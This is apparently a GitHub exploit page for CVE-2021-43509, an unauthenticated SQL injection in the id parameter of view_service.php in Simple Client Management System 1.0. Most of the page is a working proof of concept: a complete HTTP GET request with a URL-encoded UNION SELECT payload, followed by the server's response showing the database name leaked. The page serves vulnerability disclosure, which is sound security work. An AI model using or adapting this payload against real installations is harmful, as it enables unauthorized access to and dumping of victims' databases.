CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.
# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view_service.php)
# Date: 27/01/2022
# Exploit Author: Rahul Kalnarayan (r4hn1)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple Client Management System 1.0 suffers from an SQL injection vulnerability in the id parameter of view_service.php, allowing an unauthenticated user to dump the database.
Vulnerable Page: /cms/admin/maintenance/view_service.php
POC-Request
-----------------------------------
GET /cms/admin/maintenance/view_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null--+ HTTP/1.1
Host: 192.168.1.76
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
---------------------------------------
POC-Response
HTTP/1.1 200 OK
Date: Thu, 27 Jan 2022 17:34:55 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1469
Connection: close
Content-Type: text/html; charset=UTF-8
<style>
#uni_modal .modal-footer{
display:none;
}
</style>
<div class="container-fluid" id="print_out">
<div id='transaction-printable-details' class='position-relative'>
<div class="row">
<fieldset class="w-100">
<div class="col-12">
<dl>
<dt class="text-info">Name:</dt>
<dd class="pl-3"></dd>
<dt class="text-info">Description:</dt>
<dd class="pl-3">cms_db</dd>
<dt class="text-info">Price:</dt>
<dd class="pl-3"></dd>
<dt class="text-info">Status:</dt>
<dd class="pl-3">
<span class="badge badge-danger rounded-pill">Inactive</span>
</dd>
</dl>
</div>
</fieldset>
</div>
</div>
</div>
<div class="form-group">
<div class="col-12">
<div class="d-flex justify-content-end align-items-center">
<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>
</div>
</div>
</div>
<script>
$(function(){
$('.table td,.table th').addClass('py-1 px-2 align-middle')
})
</script>